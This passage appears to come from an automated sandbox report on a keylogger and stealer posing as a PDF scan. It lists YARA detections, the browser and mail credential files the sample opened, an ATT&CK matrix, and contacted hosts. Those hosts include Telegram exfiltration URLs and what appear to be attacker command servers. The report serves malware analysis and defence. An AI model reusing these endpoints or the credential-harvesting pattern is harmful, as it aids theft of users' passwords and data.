Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Queries volume information: C:\Users\user\AppData\Roaming\QeSBxb.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Queries volume information: C:\Users\user\AppData\Roaming\QeSBxb.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 0000000D.00000002.3883255353.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3882761665.0000000003191000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 9.2.QeSBxb.exe.4828a58.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.QeSBxb.exe.47e5838.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4e27af8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.QeSBxb.exe.4828a58.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4e27af8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.QeSBxb.exe.47e5838.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1461711306.0000000004AF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1498814254.0000000004755000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe PID: 1036, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe PID: 2788, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: QeSBxb.exe PID: 6708, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: QeSBxb.exe PID: 4568, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 9.2.QeSBxb.exe.4828a58.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.QeSBxb.exe.47e5838.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4e27af8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.QeSBxb.exe.4828a58.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4e27af8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.QeSBxb.exe.47e5838.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.3879340417.0000000000435000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1461711306.0000000004AF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1498814254.0000000004755000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe PID: 1036, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: QeSBxb.exe PID: 6708, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: QeSBxb.exe PID: 4568, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match	File source: 9.2.QeSBxb.exe.4828a58.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.QeSBxb.exe.47e5838.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4e27af8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.QeSBxb.exe.4828a58.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4e27af8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.QeSBxb.exe.47e5838.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.3882761665.0000000003299000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1461711306.0000000004AF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1498814254.0000000004755000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe PID: 1036, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe PID: 2788, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: QeSBxb.exe PID: 6708, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: QeSBxb.exe PID: 4568, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 0000000D.00000002.3883255353.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3882761665.0000000003191000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 9.2.QeSBxb.exe.4828a58.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.QeSBxb.exe.47e5838.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4e27af8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.QeSBxb.exe.4828a58.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4e27af8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.QeSBxb.exe.47e5838.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1461711306.0000000004AF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1498814254.0000000004755000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe PID: 1036, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe PID: 2788, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: QeSBxb.exe PID: 6708, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: QeSBxb.exe PID: 4568, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 9.2.QeSBxb.exe.4828a58.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.QeSBxb.exe.47e5838.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4e27af8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.QeSBxb.exe.4828a58.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4e27af8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.QeSBxb.exe.47e5838.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.3879340417.0000000000435000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1461711306.0000000004AF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1498814254.0000000004755000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe PID: 1036, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: QeSBxb.exe PID: 6708, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: QeSBxb.exe PID: 4568, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	111 Process Injection	1 Masquerading	1 OS Credential Dumping	1 Query Registry	Remote Services	1 Email Collection	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	11 Disable or Modify Tools	LSASS Memory	11 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	1 Data from Local System	3 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	111 Process Injection	NTDS	31 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	12 Software Packing	Cached Domain Credentials	1 System Network Configuration Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	1 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	13 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	26%	ReversingLabs	Win32.Trojan.CrypterX
Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\QeSBxb.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\QeSBxb.exe	26%	ReversingLabs	Win32.Trojan.CrypterX

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
http://checkip.dyndns.org/	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://checkip.dyndns.org/q	0%	URL Reputation	safe
https://reallyfreegeoip.org	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	188.114.97.3	true	true	unknown
api.telegram.org	149.154.167.220	true	true	unknown
checkip.dyndns.com	132.226.247.73	true	false	unknown
checkip.dyndns.org	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20and%20Time:%2025/10/2024%20/%2018:18:44%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20377142%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false		unknown
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20and%20Time:%2025/10/2024%20/%2019:57:31%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20377142%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false		unknown
https://reallyfreegeoip.org/xml/173.254.250.81	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.office.com/	QeSBxb.exe, 0000000D.00000002.3883255353.0000000003042000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3883255353.0000000003033000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/chrome_newtab	Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3890931834.00000000041B1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3890931834.00000000041B1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org	Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3882761665.0000000003276000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3883255353.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3890931834.00000000041B1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://api.telegram.org/bot	Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000001.00000002.1461711306.0000000004AF4000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3882761665.0000000003276000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 00000009.00000002.1498814254.0000000004755000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3883255353.0000000002F35000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3879340417.0000000000435000.00000040.00000400.00020000.00000000.sdmp	false		unknown
https://www.office.com/lB	Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3882761665.000000000337E000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3883255353.000000000303D000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3890931834.00000000041B1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org	Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3882761665.0000000003191000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3883255353.0000000002E51000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3890931834.00000000041B1000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3892287953.0000000003E73000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=	Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3882761665.0000000003276000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3883255353.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://chrome.google.com/webstore?hl=en	QeSBxb.exe, 0000000D.00000002.3883255353.0000000003011000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://www.ecosia.org/newtab/	Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3890931834.00000000041B1000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3892287953.0000000003E73000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, QeSBxb.exe.1.dr	false	URL Reputation: safe	unknown
http://varders.kozow.com:8081	Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000001.00000002.1461711306.0000000004AF4000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3882761665.0000000003191000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 00000009.00000002.1498814254.0000000004755000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3883255353.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3879340417.0000000000430000.00000040.00000400.00020000.00000000.sdmp	false		unknown
http://aborters.duckdns.org:8081	Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000001.00000002.1461711306.0000000004AF4000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3882761665.0000000003191000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 00000009.00000002.1498814254.0000000004755000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3883255353.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3879340417.0000000000430000.00000040.00000400.00020000.00000000.sdmp	false		unknown
https://ac.ecosia.org/autocomplete?q=	Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3890931834.00000000041B1000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3892287953.0000000003E73000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20a	Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3882761665.0000000003276000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3883255353.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://anotherarmy.dns.army:8081	Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000001.00000002.1461711306.0000000004AF4000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3882761665.0000000003191000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 00000009.00000002.1498814254.0000000004755000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3883255353.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3879340417.0000000000430000.00000040.00000400.00020000.00000000.sdmp	false		unknown
https://reallyfreegeoip.org/xml/173.254.250.81$	Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3882761665.0000000003208000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3882761665.000000000324E000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3882761665.0000000003276000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3883255353.0000000002F0E000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3883255353.0000000002EC8000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3883255353.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3890931834.00000000041B1000.00000004.00000800.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3892287953.0000000003E73000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
